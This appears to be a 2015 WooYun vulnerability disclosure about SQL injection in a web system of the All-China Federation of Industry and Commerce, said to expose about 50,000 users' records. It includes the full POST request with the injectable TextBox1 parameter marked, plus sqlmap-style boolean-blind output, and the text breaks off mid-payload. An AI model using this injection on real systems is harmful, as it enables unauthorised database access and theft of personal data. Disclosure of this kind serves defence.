当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158959

漏洞标题:全国工商联某系统MSSQL注入漏洞涉及5W用户信息

相关厂商:cncert国家互联网应急中心

漏洞作者: 无名人

提交时间:2015-12-08 11:28

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-11: 厂商已经确认,细节仅向厂商公开
2015-12-21: 细节向核心白帽子及相关领域专家公开
2015-12-31: 细节向普通白帽子公开
2016-01-10: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

RT

详细说明:

漏洞地址:

POST /EnterpriseInformation.aspx HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 10344
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/EnterpriseInformation.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDSCQQQCSD=ONNPKMMBEAAKBGMMONMKHDBB
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTkyNTk4MTQ0Mg9kFgJmD2QWAgIDD2QWBgIBD2QWBAIBDw8WAh4EVGV4dAUgMjAxNeW5tDEy5pyIN%2BaXpSDmmJ%2FmnJ%2FkuIAgIDQ6MzNkZAIDD2QWAgIJDxYCHgtfIUl0ZW1Db3VudAIFFgpmD2QWAmYPFQIEMzQ2OVflhajlm73lt6XllYbogZTlip7lhazljoXlhbPkuo7lvIDlsZXpnZ7lhazmnInliLbnu4%2FmtY7lj5HlsZXnjq%2FlooPor4Tku7flt6XkvZznmoTpgJrnn6VkAgEPZBYCZg8VAgQzNDYzL%2BWuieW%2BveWHuuWPsOmHkeiejeacjeWKoeWunuS9k%2Be7j%2Ba1jjEy5p2h5paw5pS%2FZAICD2QWAmYPFQIEMzQ2MkLlronlvr3nnIHlh7rlj7DjgIrliqDlv6vosIPnu5PmnoTovazmlrnlvI%2Fkv4PljYfnuqfooYzliqjorqHliJLjgItkAgMPZBYCZg8VAgQzMzE5LeWFqOWTsua0meS5puiusOWcqOmZleilv%2Biwg%2BeglOeahOiusuivneimgeeCuWQCBA9kFgJmDxUCBDMyNzYu5bm%2F6KW%2FMjAxM%2BW5tOS4reWwj%2BW%2BruS8geS4mui%2FkOihjOeKtuWGteiwg%2BeglGQCAw9kFhQCBQ9kFgICAQ8WAh8BAgYWDGYPZBYCZg8VAgMxNzkn6Z2e5YWs5pyJ5Yi257uP5rWO5Y%2BR5bGV546v5aKD6K%2BE5Lu3Li4uZAIBD2QWAmYPFQIDMTY5J%2BWFs%2BS6juOAiua1meaxn%2BecgeS8geS4muW3pei1hOaUr%2BS7mC4uLmQCAg9kFgJmDxUCAzEwMRjllYbkvJrlu7rorr7kuJPpopjnm5HmtYtkAgMPZBYCZg8VAgI5MiHlrojms5Xor5rkv6HkuJPpopjnm5HmtYvosIPmn6XooahkAgQPZBYCZg8VAgI4OB%2FmuZbljJfnnIEyMDE05bm056ys5LiJ5a2j5bqmLi4uZAIFD2QWAmYPFQICNzAn5YWz5LqO5b2T5YmN57uP5rWO5b2i5Yq%2F5ZKM5LyB5Lia5Y%2BRLi4uZAIHDw8WBB4CaWQFAzEyMB4EcHRpZAUDNjIxZBYEAgEPDxYCHwAFOeS9oOefpemBk%2BS4iuS4quaciOWPrOW8gOeahOS4reWkrue7n%2BaImOW3peS9nOS8muiuruWQl%2B%2B8n2RkAgMPEA8WBh4NRGF0YVRleHRGaWVsZAUHa2V5TmFtZR4ORGF0YVZhbHVlRmllbGQFAmlkHgtfIURhdGFCb3VuZGdkEBUGCEEu55%2Bl6YGTC0Iu5LiN55%2Bl6YGTGkMu5LiN5YWz5b%2BD77yM5rKh5pyJ55WZ5oSPKUQu5ZCs6K%2B06L%2BH77yM5L2G5piv5LiN5riF5qWa5YW35L2T5YaF5a65VkUu6Z2e5bi45YWz5b%2BD77yM54m55Yir5piv5a%2B55bel5ZWG6IGU5ZKM6Z2e5YWs5pyJ5Yi257uP5rWO5Lq65aOr5o%2BQ5Ye65LqG5b6I5aSa6KaB5rGCPkYu5ZCs6K%2B06L%2BH77yM5L2G5piv5a%2B55YaF5a656IO95ZCm5omn6KGM5LiN5oqx5pyJ5aSq5aSa5pyf5pybFQYDOTQ0Azk0NQM5NDYDOTQ3Azk0OAM5NDkUKwMGZ2dnZ2dnZGQCCQ8WAh8BAgIWBGYPZBYCZg8VAgI1NwzkuIrluILlhazlj7hkAgEPZBYCZg8VAgI1OA%2FpnZ7kuIrluILlhazlj7hkAg0PZBYCZg9kFgJmD2QWBgIBDxAPFgYfBAUEbmFtZR8FBQJpZB8GZ2QQFSENLS3pgInmi6nnnIEtLQnljJfkuqzluIIG6KW%2F6JePCeS6keWNl%2BecgQnlm5vlt53nnIEJ6LS15bee55yBCea1t%2BWNl%2BecgQnlub%2Fopb%2FnnIEJ5bm%2F5Lic55yBCeemj%2BW7uuecgQnmsZ%2Fopb%2FnnIEJ5a6J5b6955yBCea1meaxn%2BecgQnmsZ%2Foi4%2FnnIEJ5rmW5Y2X55yBCea5luWMl%2BecgQnpnZLmtbfnnIEG5paw55aGBuWugeWkjwnnlJjogoPnnIEJ6ZmV6KW%2F55yBCeWxseilv%2BecgQnlhoXokpnlj6QJ5rKz5Y2X55yBCeWxseS4nOecgQnmsrPljJfnnIEJ5ZCJ5p6X55yBCem7kem%2Bmeaxnwnovr3lroHnnIEJ5LiK5rW35biCCeWkqea0peW4ggnph43luobluIIY5paw55aG55Sf5Lqn5bu66K6%2B5YW15ZuiFSECLTEBMQEyATMBNAE1ATYBNwE4ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMTkCMjACMjECMjICMjMCMjQCMjUCMjYCMjcCMjgCMjkCMzACMzECMzIUKwMhZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnFgFmZAIDDxAPFgYfBAUEbmFtZR8FBQJpZB8GZ2QQFQENLS3pgInmi6nluIItLRUBAi0xFCsDAWcWAWZkAgUPEA8WBh8EBQRuYW1lHwUFAmlkHwZnZBAVAQ0tLemAieaLqeWOvy0tFQECLTEUKwMBZ2RkAg8PEA8WBh8EBQRuYW1lHwUFAmlkHwZnZBAVIAnor7fpgInmi6kG55S15a2QBuWutueUtR%2Fova%2Fku7blkozkv6Hmga%2FmioDmnK%2FmnI3liqHkuJogHeiuoeeul%2Bacui%2FpgJrorq8v572R57uc6K6%2B5aSHG%2BmHkeiejS%2Fpk7booYwv5L%2Bd6ZmpL%2BivgeWIuAbmibnlj5EZ5peF5ri45pyN5YqhL%2BaXhea4uOW8gOWPkQnppJDppa7kuJoM5Lqk6YCa6L%2BQ6L6TM%2BWqkuS9k%2B%2B8iOWHuueJiC%2Flub%2Fmkq0v5pyJ57q%2F55S16KeGL%2Be9kee7nOWqkuS9k%2B%2B8iRrlub%2FlkYov5biC5Zy66JCl6ZSAL%2BWFrOWFsyflqLHkuZDvvIjnlLXlvbEv6Z%2Bz5LmQL%2Ba4uOaIjy%2FoibrmnK%2FvvIkX5bel5Lia5Yi26YCg77yI6Z2eSVTvvIkU5Yy755aXL%2BWNq%2BeUny%2Fkv53lgaUU6Iiq56m6L%2BiIquWkqS%2Flhpvlt6UG5rOV5b6LFeaIv%2BWcsOS6p%2BW8gOWPkee7j%2BiQpQ3mlZnogrIv5Z%2B56K6tDOWFrOWFseS6i%2BS4mgzpob7pl67lkqjor6IM5Ye65Zu95pyN5YqhBuWFtuS7lhjlhpzjgIHmnpfjgIHniafjgIHmuJTkuJoJ5bu6562R5LiaCembtuWUruS4mgrku5PlgqjkuJogCemCruaUv%2BS4mgnkvY%2Flrr%2FkuJoP5L%2Bh5oGv5Lyg6L6T5LiaDOeJqeS4mueuoeeQhhjnp5%2FotYHlkozllYbliqHmnI3liqHkuJoVIAnor7fpgInmi6kCODUCODYDMTI3AzEyOAMxMjkDMTMwAzEzMQMxMzIDMTMzAzEzNAMxMzUDMTM2AzEzNwMxMzgDMTM5AzE0MAMxNDEDMTQyAzE0MwMxNDQDMTQ1AzE0NgMyMzcDMjM4AzIzOQMyNDADMjQxAzI0MgMyNDMDMjQ0AzI0NRQrAyBnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAhMPEA8WBh8EBQRuYW1lHwUFAmlkHwZnZBAVCgnor7fpgInmi6kMMTAw5Lq65Lul5LiLDDEwMe%2B9njUwMOS6ugs1MDF%2BMTAwMOS6ugwxMDAxfjMwMDDkuroMMzAwMX41MDAw5Lq6DDUwMDF%2BODAwMOS6ugw4MDAxfjHkuIfkuroSMX4y5LiH5Lq677yI5ZCr77yJDTLkuIfkurrku6XkuIoVCgnor7fpgInmi6kDMTAzAzEwNAMxODIDMTgzAzE4NAMxODUDMTg2AzE4NwMxODgUKwMKZ2dnZ2dnZ2dnZ2RkAhUPEA8WBh8EBQRuYW1lHwUFAmlkHwZnZBAVFwnor7fpgInmi6kOMjDkuIflj4rku6XkuIsLMjHkuId%2BNTDkuIcVNTHkuId%2BMTAw5LiH77yI5ZCr77yJFjEwMeS4h34zMDDkuIfvvIjlkKvvvIkWMzAx5LiHfjUwMOS4h%2B%2B8iOWQq%2B%2B8iRY1MDHkuId%2BODAw5LiH77yI5ZCr77yJDjgwMeS4h34xMDAw5LiHDzEwMDHkuId%2BMzAwMOS4hw8zMDAx5LiHfjUwMDDkuIcPNTAwMeS4h344MDAw5LiHDDgwMDHkuId%2BMeS6vw4x5Lq%2FfjLkur8o5ZCrKRIy5Lq%2FfjPkur%2FvvIjlkKvvvIkSM%2BS6v3415Lq%2F77yI5ZCr77yJEjXkur9%2BOOS6v%2B%2B8iOWQq%2B%2B8iRM45Lq%2FfjEw5Lq%2F77yI5ZCr77yJFDEw5Lq%2FfjE15Lq%2F77yI5ZCr77yJFDE15Lq%2FfjIw5Lq%2F77yI5ZCr77yJFDIw5Lq%2FfjMw5Lq%2F77yI5ZCr77yJFDMw5Lq%2FfjUw5Lq%2F77yI5ZCr77yJFTUw5Lq%2FfjEwMOS6v%2B%2B8iOWQq%2B%2B8iQwxMDDkur%2Fku6XkuIoVFwnor7fpgInmi6kCOTkDMTAwAzE0OQMxNTADMTUxAzE1MgMxNTMDMTU0AzE1NQMxNTYDMTU3AzE1OAMxNTkDMTYwAzE2MQMxNjIDMTYzAzE2NAMxNjUDMTY2AzE2NwMxNjgUKwMXZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAIXDxAPFgYfBAUEbmFtZR8FBQJpZB8GZ2QQFRAJ6K%2B36YCJ5oupDzEwMOS4h%2BWPiuS7peS4iwwxMDHvvZ41MDDkuIcLNTAxfjEwMDDkuIcMMTAwMX4zMDAw5LiHDDMwMDF%2BNTAwMOS4hxU1MDAx5LiHfjHkur%2FvvIjlkKvvvIkGMX415Lq%2FBzZ%2BMTDkur8IMTF%2BMzDkur8IMzF%2BNTDkur8JNTF%2BMTAw5Lq%2FCjEwMX4zMDDkur8KMzAxfjUwMOS6vws1MDF%2BMTAwMOS6vxAxMDAx5Lq%2F5Y%2BK5Lul5LiKFRAJ6K%2B36YCJ5oupAzEwMQMxMDIDMTY5AzE3MAMxNzEDMTcyAzE3MwMxNzQDMTc1AzE3NgMxNzcDMTc4AzE3OQMxODADMTgxFCsDEGdnZ2dnZ2dnZ2dnZ2dnZ2dkZAIZDxYCHwFmZAIbDw8WAh4LUmVjb3JkY291bnRmZGQCBQ9kFgICAQ8WAh8BAgYWDGYPZBYCZg8VAkdodHRwOi8vd3d3LmFjZmljLm9yZy5jbi9wdWJsaWNmaWxlcy9idXNpbmVzcy9odG1sZmlsZXMvcWdnc2wvaW5kZXguaHRtbBwvdXBsb2FkLzIwMTEwODMwMzUzMDQwNjUuSlBHZAIBD2QWAmYPFQIWaHR0cDovL3d3dy5jZWVhLmdvdi5jbhwvdXBsb2FkLzIwMTEwODMwMzUwMDIxNTcuanBnZAICD2QWAmYPFQIvaHR0cDovL3d3dy5jZXQuY29tLmNuL3RtbGZpbGVzL3FnZ3NsL2luZGV4Lmh0bWwcL3VwbG9hZC8yMDExMDgzMDM0OTAxMTczLmdpZmQCAw9kFgJmDxUCLGh0dHA6Ly93d3cuZHJjbmV0LmNvbS5jbi9EUkNOZXQuY2hhbm5lbC53ZWIvHC91cGxvYWQvMjAxMTA4MzAzNTQyODI4MS5qcGdkAgQPZBYCZg8VAhFodHRwOi8vd3d3LnNtZS5jbhQvdXBsb2FkL2R6c3dsb2dvLmpwZ2QCBQ9kFgJmDxUCFWh0dHA6Ly93d3cuaHpxeWouY29tLxIvdXBsb2FkL2hhbmdzdy5qcGdkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBStjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJEwyXzEkSW1hZ2VCdXR0b24xBStjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJEwyXzEkSW1hZ2VCdXR0b24ykM2tZkqK2ZHhlcNyied2YO%2F1XiYT3%2BG%2B4FHMn14UX8k%3D&ctl00%24head1%24txtName=&ctl00%24head1%24txtPwd=&ctl00%24ContentPlaceHolder1%24SelectNew1%24TextBox1=&ctl00%24ContentPlaceHolder1%24L2_1%24RadioButtonList1=944&ctl00%24ContentPlaceHolder1%24TextBox1=1*&ctl00%24ContentPlaceHolder1%24WUC_SelectPrivonceAndCity1%24DDLPrivonce=-1&ctl00%24ContentPlaceHolder1%24WUC_SelectPrivonceAndCity1%24DDLCity=-1&ctl00%24ContentPlaceHolder1%24WUC_SelectPrivonceAndCity1%24DDLDistrict=-1&ctl00%24ContentPlaceHolder1%24DropDownList1=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00%24ContentPlaceHolder1%24Button1=%E5%BC%80%E5%A7%8B%E7%AD%9B%E9%80%89&ctl00%24ContentPlaceHolder1%24DropDownList2=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00%24ContentPlaceHolder1%24DropDownList3=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00%24ContentPlaceHolder1%24DropDownList4=%E8%AF%B7%E9%80%89%E6%8B%A9&__VIEWSTATEGENERATOR=05CD102A&__EVENTVALIDATION=%2FwEdAIgB40xJGZXbv%2FpCOxirg8eB8JfEEqqP4bqmSRH0VKdiYH6jHEir1WUjmOVMY4HZHCxKUGe3%2Bx9izkoZO79Bgk1ZeW3UgITgvjQmKkT7mMFmA8ZWiNNLGNYm%2BeGjb%2BmVIgiJo%2FasO1fpUbK7sC5FlhWfL9OEXulIpLOKsrCPh%2FeUokRmTimNyMsWii4D37OOIsJGe9DEWcJY7nYEMCdteb%2Bt6yfUjJLPos%2FJF3Xzadi44bXlmSmdlj6Yxk%2Ft%2FauFEw1MaKFreVwSvLaZisCCLSQpEnxKN35oyj2OObx5%2FHRN7DWHRXHHviP%2BOpzyheN2VWYduaA4pXvOjV2fXIMKskLw%2B4kHj7KsGQZ9KI%2Fq0cgR79e03N88FXKmPF1czOchXoEcpjuvP9iKBVZYO486shgjqOo%2BfuVe23rvCGKyQQftoVgkZcjnNgXZKFTDwG4rnIf6ig%2BQn7RYRd6gODzxsauJ23VOtDw3xik7dzIdhM7Hu3Zvj%2BlnuwHzszYdcIS6wBRxLs1TqEnhUEkqQIxcJ5ADDiB7OJpo5MdNePERqCziFP2JeZEGIF%2BvV7tNRpbOGPNBfQzqf9TzbeuPZQkNDo6c1FjpgBLYF1uv4foXIJiWLxYlGYijyf%2F6oy8JxZn1Uwf8OCrwDhr5X6J363tG2PuASCnUQaegufk4saWGUuv%2FThXKvHIFaKwQW7dM1udJN0VF5ivldxQEdmb0ZCa4%2BLKozKRYeTWQh3UXsNVfqGY%2B5EAvaupe%2FSg%2BpzFlJW9aj%2BtIE5P%2F3Bv6AQAGP81f0XcZYC%2BYsz0tw8juGcC1t2Zv%2FTG2lzqLZQ3UIrdUhfPyfGmyLeEQ2HPQ9IHNrLgWU2mzUbtQidu1WSSQ3eTuAP99bEwiJuCqzXX6uwHLG7vQL5vy9NaQ8RwlLU5TMWHyyG6pUg1%2FmXkP%2FI3kP95HaC1NTas9i3mMQ0LLb5rotZ5L%2Fmu5QE9pqtTi88RbGUPG7LzbWJOFpBjJKNU1qDmXRCtVvB1LBbJcPw85HQm3xNa5yClTsNeppTTbZsQ%2B%2BCcSB1rAPST7A2bQKERC48V4nbGNz85oNF5ICxcsFQYjWxVEWeNuI3s1VQvNtun0RlyO7cSc2Vp%2FqNYMkWv%2FTbbxEv9cyDug8qF7MGlOLspCP%2F9mjod%2FpDa0Nnee9UD56Jc25vwkdRRPTCJ7mveOsi2Q8RMC%2BiS39g9pMhlVA%2B837B%2FZsspN%2FjxZRWPrVadi1aqcwLrcU%2Bm%2BwJPPNaDtnQuTtM61veJbytPtVAAu1QLgZ%2BAvGxE2MNIrNDHVc%2BG8Ff1Lh1U5LXd4BHO2JmpxQ4%2F3w1kh6zFoRTr%2B4WXQRitUlkICKLDbv633Zok2ETKxpaNR3zjVUpmaj5rOpVgXV8v4hwGs%2Fg0mukOO2mv4B7mHijXMPkFcGQ6RqRlzdksx6TWEERaBQYHqGChRXB%2FltGnv2ANpyJ7rDMp8mdIOB949U8QOCvMXdYrEk4zjm79EMwkjTexpcmWi00LnDypHJSdT%2FKTZj8ygx2l1twGkHP9T0F6UuoU7l%2FE0eA303qibmAEZlpnjDP8MektuALd8kRrgQxdxVD5XNkTerIIo8%2B%2FM7FfGjAjuGX%2BkDj3ajw2Ua3NgQY%2FeAeDYpT03qs9KCH1sHT4U8%2FYrw1VbhG4MdHnjdNIqkpRyio4DXibrvZs6QcL7yOxP7%2BAbDl9DgHhCzZ2vsQS%2FI2%2BVrkoeJnVFPBc29AnY5w%2FX5UbhBYWM7%2Fz3Um3GPC8UieBBRa8NQCaC9qydZUL5kL%2FVzkBi1nYQLa6kPW6hOZBvIIySlDmrs3SLsygw%2FaFO8mQBK8gz9qzU7I%2FXJTYw5BCMO7fmjkJSfq6Zbgk2kTWnpWSRYEqbqUrZdRCy0uuDEGfynzOAV3RkmSW8PERd0mYm9hBzg5gT0AuaGVVw8o8mlOiXaLqVn63zFpysdQ%2FFBrwflhnVLbDtyPpe9EqNlnFJGNLPiYpFpbGrODFadSzDGRg0hAh6pIQrQJ68gNWvE0w8DmZnA6sg4K6T1QewAepe7egPM4LxC6cnPsSa9hZRt3hePv1WW9PIeCGl7FaFhGfVg8HQDbWFDFB%2B%2B7Lb%2BH5EphUUcl21stJsJBQXOrDHNx5wjyDbzva7ZUV5659cBwTdtg%2BPsaL20kuqEKZaULNr7RDr98s6ZQkevElJBnwV0e%2Fjvofu1W6fyDVPdZbhhruLp6t9bOou1J1zzhAmCkllJmggv%2FEiQQvBqgZh88tBzof%2FeG%2BNXA%2Fzn6ka0WPRzHuqNUZguXVHX26zGnB2Z6FlBU0gOtekX0iAnTE8WgmP7e7BvCparZ55ffM%2BG87M4EhDudGM6LDza%2FOmwx1j11yj7RN4cX8mwyOBXUAGrRrQSc5TobR8Nw4o8ilubO5WeBoshyqMqEmHfucqMH3PQ6BkNeUnC6EGIFwY1qQqRTzqdu0BI6zeC%2B6%2BwamOaer0%2F5ZucVTWeTEMO%2BDsiWj0UBd0I3MtiVTeQ2BuNhzUrnW6CsvueCc5ABGYRTH%2BRcYsi%2FuqHQ%2BbkMLI7UsonGwXfDGC7b41wEBEpf08LX1fGqsxYnAfXVLEsuDajRnOaalbXX%2FdMRl4rv0u9MKx0UxwPQRdBp9xbm7k1kUklHw72gFJkdc7FNdCsjHMarsoN61Sh7y6KH7JNGp1gB7sJyAf%2B6EAtQsaevz5M7THmTD3BR3UpB6bZ6KyhfXAvEeQtHnIgnLlU%2Bu8E%2FUP%2BOCsovYmsKv9v6DGJSwzi9tBfih%2F2bT%2BlSC5kEb9SmLyMFSEKa2xijx%2FvDF68ofK48GLAYarqLE9XTYW0Y8Ouj7c26dSvLXVgKMNr69mJpZTqoZinxijfH%2FQpgaTtgz1rEb9%2BHMTPSZunyL0D2uAJZn%2F2IiOG%2BwWW%2BZEaDV5qFa7HjNz623TRgE0XN66eZO3c6dojVQsWA4uSzuKYYlGsj0W5LLjakaa


ctl00%24ContentPlaceHolder1%24TextBox1参数存在布尔和报错注入

---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMT
kyNTk4MTQ0Mg9kFgJmD2QWAgIDD2QWBgIBD2QWBAIBDw8WAh4EVGV4dAUgMjAxNeW5tDEy5pyIN+aXpS
DmmJ/mnJ/kuIAgIDQ6MzNkZAIDD2QWAgIJDxYCHgtfIUl0ZW1Db3VudAIFFgpmD2QWAmYPFQIEMzQ2OV
flhajlm73lt6XllYbogZTlip7lhazljoXlhbPkuo7lvIDlsZXpnZ7lhazmnInliLbnu4/mtY7lj5HlsZ
Xnjq/looPor4Tku7flt6XkvZznmoTpgJrnn6VkAgEPZBYCZg8VAgQzNDYzL+WuieW+veWHuuWPsOmHke
iejeacjeWKoeWunuS9k+e7j+a1jjEy5p2h5paw5pS/ZAICD2QWAmYPFQIEMzQ2MkLlronlvr3nnIHlh7
rlj7DjgIrliqDlv6vosIPnu5PmnoTovazmlrnlvI/kv4PljYfnuqfooYzliqjorqHliJLjgItkAgMPZB
YCZg8VAgQzMzE5LeWFqOWTsua0meS5puiusOWcqOmZleilv+iwg+eglOeahOiusuivneimgeeCuWQCBA
9kFgJmDxUCBDMyNzYu5bm/6KW/MjAxM+W5tOS4reWwj+W+ruS8geS4mui/kOihjOeKtuWGteiwg+eglG
QCAw9kFhQCBQ9kFgICAQ8WAh8BAgYWDGYPZBYCZg8VAgMxNzkn6Z2e5YWs5pyJ5Yi257uP5rWO5Y+R5b
GV546v5aKD6K+E5Lu3Li4uZAIBD2QWAmYPFQIDMTY5J+WFs+S6juOAiua1meaxn+ecgeS8geS4muW3pe
i1hOaUr+S7mC4uLmQCAg9kFgJmDxUCAzEwMRjllYbkvJrlu7rorr7kuJPpopjnm5HmtYtkAgMPZBYCZg
8VAgI5MiHlrojms5Xor5rkv6HkuJPpopjnm5HmtYvosIPmn6XooahkAgQPZBYCZg8VAgI4OB/muZbljJ
fnnIEyMDE05bm056ys5LiJ5a2j5bqmLi4uZAIFD2QWAmYPFQICNzAn5YWz5LqO5b2T5YmN57uP5rWO5b
2i5Yq/5ZKM5LyB5Lia5Y+RLi4uZAIHDw8WBB4CaWQFAzEyMB4EcHRpZAUDNjIxZBYEAgEPDxYCHwAFOe
S9oOefpemBk+S4iuS4quaciOWPrOW8gOeahOS4reWkrue7n+aImOW3peS9nOS8muiuruWQl++8n2RkAg
MPEA8WBh4NRGF0YVRleHRGaWVsZAUHa2V5TmFtZR4ORGF0YVZhbHVlRmllbGQFAmlkHgtfIURhdGFCb3
VuZGdkEBUGCEEu55+l6YGTC0Iu5LiN55+l6YGTGkMu5LiN5YWz5b+D77yM5rKh5pyJ55WZ5oSPKUQu5Z
Cs6K+06L+H77yM5L2G5piv5LiN5riF5qWa5YW35L2T5YaF5a65VkUu6Z2e5bi45YWz5b+D77yM54m55Y
ir5piv5a+55bel5ZWG6IGU5ZKM6Z2e5YWs5pyJ5Yi257uP5rWO5Lq65aOr5o+Q5Ye65LqG5b6I5aSa6K
aB5rGCPkYu5ZCs6K+06L+H77yM5L2G5piv5a+55YaF5a656IO95ZCm5omn6KGM5LiN5oqx5pyJ5aSq5a
Sa5pyf5pybFQYDOTQ0Azk0NQM5NDYDOTQ3Azk0OAM5NDkUKwMGZ2dnZ2dnZGQCCQ8WAh8BAgIWBGYPZB
YCZg8VAgI1NwzkuIrluILlhazlj7hkAgEPZBYCZg8VAgI1OA/pnZ7kuIrluILlhazlj7hkAg0PZBYCZg
9kFgJmD2QWBgIBDxAPFgYfBAUEbmFtZR8FBQJpZB8GZ2QQFSENLS3pgInmi6nnnIEtLQnljJfkuqzluI
IG6KW/6JePCeS6keWNl+ecgQnlm5vlt53nnIEJ6LS15bee55yBCea1t+WNl+ecgQnlub/opb/nnIEJ5b
m/5Lic55yBCeemj+W7uuecgQnmsZ/opb/nnIEJ5a6J5b6955yBCea1meaxn+ecgQnmsZ/oi4/nnIEJ5r
mW5Y2X55yBCea5luWMl+ecgQnpnZLmtbfnnIEG5paw55aGBuWugeWkjwnnlJjogoPnnIEJ6ZmV6KW/55
yBCeWxseilv+ecgQnlhoXokpnlj6QJ5rKz5Y2X55yBCeWxseS4nOecgQnmsrPljJfnnIEJ5ZCJ5p6X55
yBCem7kem+meaxnwnovr3lroHnnIEJ5LiK5rW35biCCeWkqea0peW4ggnph43luobluIIY5paw55aG55
Sf5Lqn5bu66K6+5YW15ZuiFSECLTEBMQEyATMBNAE1ATYBNwE4ATkCMTACMTECMTICMTMCMTQCMTUCMT
YCMTcCMTgCMTkCMjACMjECMjICMjMCMjQCMjUCMjYCMjcCMjgCMjkCMzACMzECMzIUKwMhZ2dnZ2dnZ2
dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnFgFmZAIDDxAPFgYfBAUEbmFtZR8FBQJpZB8GZ2QQFQENLS
3pgInmi6nluIItLRUBAi0xFCsDAWcWAWZkAgUPEA8WBh8EBQRuYW1lHwUFAmlkHwZnZBAVAQ0tLemAie
aLqeWOvy0tFQECLTEUKwMBZ2RkAg8PEA8WBh8EBQRuYW1lHwUFAmlkHwZnZBAVIAnor7fpgInmi6kG55
S15a2QBuWutueUtR/ova/ku7blkozkv6Hmga/mioDmnK/mnI3liqHkuJogHeiuoeeul+acui/pgJrorq
8v572R57uc6K6+5aSHG+mHkeiejS/pk7booYwv5L+d6ZmpL+ivgeWIuAbmibnlj5EZ5peF5ri45pyN5Y
qhL+aXhea4uOW8gOWPkQnppJDppa7kuJoM5Lqk6YCa6L+Q6L6TM+WqkuS9k++8iOWHuueJiC/lub/mkq
0v5pyJ57q/55S16KeGL+e9kee7nOWqkuS9k++8iRrlub/lkYov5biC5Zy66JCl6ZSAL+WFrOWFsyflqL
HkuZDvvIjnlLXlvbEv6Z+z5LmQL+a4uOaIjy/oibrmnK/vvIkX5bel5Lia5Yi26YCg77yI6Z2eSVTvvI
kU5Yy755aXL+WNq+eUny/kv53lgaUU6Iiq56m6L+iIquWkqS/lhpvlt6UG5rOV5b6LFeaIv+WcsOS6p+
W8gOWPkee7j+iQpQ3mlZnogrIv5Z+56K6tDOWFrOWFseS6i+S4mgzpob7pl67lkqjor6IM5Ye65Zu95p
yN5YqhBuWFtuS7lhjlhpzjgIHmnpfjgIHniafjgIHmuJTkuJoJ5bu6562R5LiaCembtuWUruS4mgrku5
PlgqjkuJogCemCruaUv+S4mgnkvY/lrr/kuJoP5L+h5oGv5Lyg6L6T5LiaDOeJqeS4mueuoeeQhhjnp5
/otYHlkozllYbliqHmnI3liqHkuJoVIAnor7fpgInmi6kCODUCODYDMTI3AzEyOAMxMjkDMTMwAzEzMQ
MxMzIDMTMzAzEzNAMxMzUDMTM2AzEzNwMxMzgDMTM5AzE0MAMxNDEDMTQyAzE0MwMxNDQDMTQ1AzE0Ng
MyMzcDMjM4AzIzOQMyNDADMjQxAzI0MgMyNDMDMjQ0AzI0NRQrAyBnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2
dnZ2dnZ2dnZ2dnZ2RkAhMPEA8WBh8EBQRuYW1lHwUFAmlkHwZnZBAVCgnor7fpgInmi6kMMTAw5Lq65L
ul5LiLDDEwMe+9njUwMOS6ugs1MDF+MTAwMOS6ugwxMDAxfjMwMDDkuroMMzAwMX41MDAw5Lq6DDUwMD
F+ODAwMOS6ugw4MDAxfjHkuIfkuroSMX4y5LiH5Lq677yI5ZCr77yJDTLkuIfkurrku6XkuIoVCgnor7
fpgInmi6kDMTAzAzEwNAMxODIDMTgzAzE4NAMxODUDMTg2AzE4NwMxODgUKwMKZ2dnZ2dnZ2dnZ2RkAh
UPEA8WBh8EBQRuYW1lHwUFAmlkHwZnZBAVFwnor7fpgInmi6kOMjDkuIflj4rku6XkuIsLMjHkuId+NT
DkuIcVNTHkuId+MTAw5LiH77yI5ZCr77yJFjEwMeS4h34zMDDkuIfvvIjlkKvvvIkWMzAx5LiHfjUwMO
S4h++8iOWQq++8iRY1MDHkuId+ODAw5LiH77yI5ZCr77yJDjgwMeS4h34xMDAw5LiHDzEwMDHkuId+Mz
AwMOS4hw8zMDAx5LiHfjUwMDDkuIcPNTAwMeS4h344MDAw5LiHDDgwMDHkuId+MeS6vw4x5Lq/fjLkur
8o5ZCrKRIy5Lq/fjPkur/vvIjlkKvvvIkSM+S6v3415Lq/77yI5ZCr77yJEjXkur9+OOS6v++8iOWQq+
+8iRM45Lq/fjEw5Lq/77yI5ZCr77yJFDEw5Lq/fjE15Lq/77yI5ZCr77yJFDE15Lq/fjIw5Lq/77yI5Z
